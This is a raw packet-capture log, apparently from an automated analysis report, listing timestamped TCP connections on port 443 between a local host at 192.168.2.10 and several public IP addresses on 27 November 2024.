                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.101726055 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.227041960 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.227062941 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.227226973 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.227256060 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.227370024 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.242116928 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.242135048 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.242259979 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.242281914 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.242434978 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.257338047 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.257355928 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.257442951 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.257460117 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.257608891 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.270576954 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.270602942 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.270651102 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.270670891 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.270684958 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.270701885 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.286333084 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.286353111 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.286413908 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.286427021 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.286540985 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.300350904 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.300369978 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.300434113 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.300451040 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.300462008 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.300563097 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408704996 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408802032 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408802986 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408915997 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408941984 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408957958 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408965111 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408974886 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.408978939 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.457820892 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.457875013 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.457956076 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.458995104 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.459045887 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.459110975 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.459836006 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.459868908 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.459940910 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460016966 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460031986 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460176945 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460231066 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460289955 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460325956 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460339069 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460364103 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460376978 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460441113 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.460455894 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.461334944 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.461359978 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.461421013 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.461510897 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.461520910 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.380934954 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.381067038 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.383899927 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.383908987 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.384258032 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.435584068 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.486574888 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.531328917 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.576200008 CET49674443192.168.2.10173.222.162.55
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:22.576257944 CET49675443192.168.2.10173.222.162.55
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.176789999 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.177659988 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.177681923 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.178292990 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.178298950 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.250591040 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.251158953 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.251188040 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.251663923 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.251671076 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.251945019 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252238035 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252275944 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252443075 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252603054 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252609968 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252752066 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.252763987 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.253155947 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.253163099 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.255465031 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.255840063 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.255857944 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.256198883 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.256205082 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292673111 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292701960 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292710066 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292747021 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292762995 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292795897 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292824030 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292849064 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.292870045 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.425537109 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.425573111 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.425621986 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.425662994 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.425673008 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.425700903 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.432431936 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.432538986 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.437633991 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.437726021 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.437727928 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.437778950 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.447216988 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.447268009 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.447283030 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.447292089 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.617628098 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.617665052 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.617798090 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.617821932 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.618068933 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.618077040 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.618092060 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.618103981 CET49712443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.618123055 CET4434971213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.620945930 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.620974064 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.621195078 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.621365070 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.621377945 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.677875042 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.677931070 CET44349715172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.678050041 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.678374052 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.678390980 CET44349715172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695000887 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695071936 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695147991 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695358038 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695375919 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695388079 CET49713443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.695394039 CET4434971313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696136951 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696202993 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696257114 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696436882 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696456909 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696468115 CET49709443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.696472883 CET4434970913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698399067 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698436022 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698503971 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698525906 CET49717443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698585033 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698640108 CET49717443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698683023 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698694944 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698796988 CET49717443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.698808908 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.701803923 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.701836109 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.701894999 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.701910019 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.701946020 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.702162027 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.702167034 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.702188969 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.702328920 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.702357054 CET4434971113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.702394009 CET49711443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.704541922 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.704566956 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.704651117 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.704809904 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.704819918 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.705919027 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.705948114 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706001997 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706021070 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706065893 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706180096 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706186056 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706201077 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706325054 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706366062 CET4434971013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.706415892 CET49710443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.708298922 CET49719443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.708328009 CET4434971913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.708400965 CET49719443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.708530903 CET49719443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.708542109 CET4434971913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.990071058 CET44349715172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.990176916 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.992279053 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.992285013 CET44349715172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.992532015 CET44349715172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.993947029 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.994072914 CET49715443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.994092941 CET44349715172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:24.998053074 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.411853075 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.412527084 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.412555933 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.413014889 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.413022995 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.487154961 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.487647057 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.487672091 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.488303900 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.488311052 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.492044926 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.492474079 CET49717443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.492516041 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.492544889 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.492939949 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.492949963 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.493074894 CET49717443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.493082047 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.493427038 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.493432999 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.855720043 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.855799913 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.855921030 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.856142998 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.856163025 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.856169939 CET49714443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.856174946 CET4434971413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.869189024 CET49720443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.869239092 CET4434972013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.869338036 CET49720443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.869606018 CET49720443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.869625092 CET4434972013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.933737993 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.933815956 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.934107065 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.934144020 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.934144020 CET49716443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.934161901 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.934166908 CET4434971613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937144995 CET49721443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937192917 CET4434972113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937310934 CET49721443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937408924 CET49721443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937419891 CET4434972113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937901974 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.937973022 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.938091040 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.938124895 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.938124895 CET49718443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.938142061 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.938146114 CET4434971813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.940237045 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.940299988 CET49722443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.940310955 CET4434971713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.940346003 CET4434972213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:25.940429926 CET49717443192.168.2.1013.107.246.43
